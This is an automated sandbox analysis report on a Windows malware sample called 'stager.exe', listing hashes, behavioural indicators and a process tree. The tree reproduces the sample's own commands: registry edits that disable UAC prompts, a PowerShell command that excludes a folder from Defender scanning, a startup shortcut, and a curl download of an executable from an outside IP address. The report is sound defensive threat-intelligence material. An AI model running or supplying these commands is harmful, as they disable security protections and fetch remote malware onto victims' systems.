Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
118s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20230712-en -
resource tags
arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system -
submitted
19/07/2023, 13:01
Static task
static1
1 signatures
Behavioral task
behavioral1
Sample
stager.exe
Resource
win7-20230712-en
6 signatures
150 seconds
General
-
Target
stager.exe
-
Size
1.9MB
-
MD5
4ed2a8948a165b72025d5868a31a34c8
-
SHA1
b25b9db66eefe9418bb398a8a5ffe4aebb7d4ff8
-
SHA256
79d1a9ec049f598528e505aa71fdd68f01f7abcd8cb29c1e54ba018d239ae282
-
SHA512
64411bb2f3510f26114d809409dd9af29238fb1c43ee005c08c3b00826be0bce0230ad26afc786961b659d8cc470f59ed12108b4a11056b702a516330bbec380
-
SSDEEP
24576:GXjaqCL0DG3EZJOHVXGGUIHjNGxmKg7xf:GXjaADG3EWVd
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" reg.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Connector.lnk stager.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2196 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2196 powershell.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 2572 wrote to memory of 2628 2572 stager.exe 29 PID 2572 wrote to memory of 2628 2572 stager.exe 29 PID 2572 wrote to memory of 2628 2572 stager.exe 29 PID 2628 wrote to memory of 2560 2628 cmd.exe 30 PID 2628 wrote to memory of 2560 2628 cmd.exe 30 PID 2628 wrote to memory of 2560 2628 cmd.exe 30 PID 2572 wrote to memory of 2556 2572 stager.exe 31 PID 2572 wrote to memory of 2556 2572 stager.exe 31 PID 2572 wrote to memory of 2556 2572 stager.exe 31 PID 2556 wrote to memory of 1640 2556 cmd.exe 32 PID 2556 wrote to memory of 1640 2556 cmd.exe 32 PID 2556 wrote to memory of 1640 2556 cmd.exe 32 PID 2572 wrote to memory of 2680 2572 stager.exe 33 PID 2572 wrote to memory of 2680 2572 stager.exe 33 PID 2572 wrote to memory of 2680 2572 stager.exe 33 PID 2572 wrote to memory of 1284 2572 stager.exe 34 PID 2572 wrote to memory of 1284 2572 stager.exe 34 PID 2572 wrote to memory of 1284 2572 stager.exe 34 PID 1284 wrote to memory of 2196 1284 cmd.exe 35 PID 1284 wrote to memory of 2196 1284 cmd.exe 35 PID 1284 wrote to memory of 2196 1284 cmd.exe 35 PID 2572 wrote to memory of 2924 2572 stager.exe 36 PID 2572 wrote to memory of 2924 2572 stager.exe 36 PID 2572 wrote to memory of 2924 2572 stager.exe 36
Processes
-
C:\Users\Admin\AppData\Local\Temp\stager.exe"C:\Users\Admin\AppData\Local\Temp\stager.exe"1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:2572 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f3⤵
- UAC bypass
PID:2560
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2556 -
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f3⤵
- UAC bypass
PID:1640
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c mkdir "C:\MicS"2⤵PID:2680
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\MicS"2⤵
- Suspicious use of WriteProcessMemory
PID:1284 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\MicS"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2196
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl -o "C:\MicS\Connector.exe" "http://13.50.250.113/Connector.exe"2⤵PID:2924
-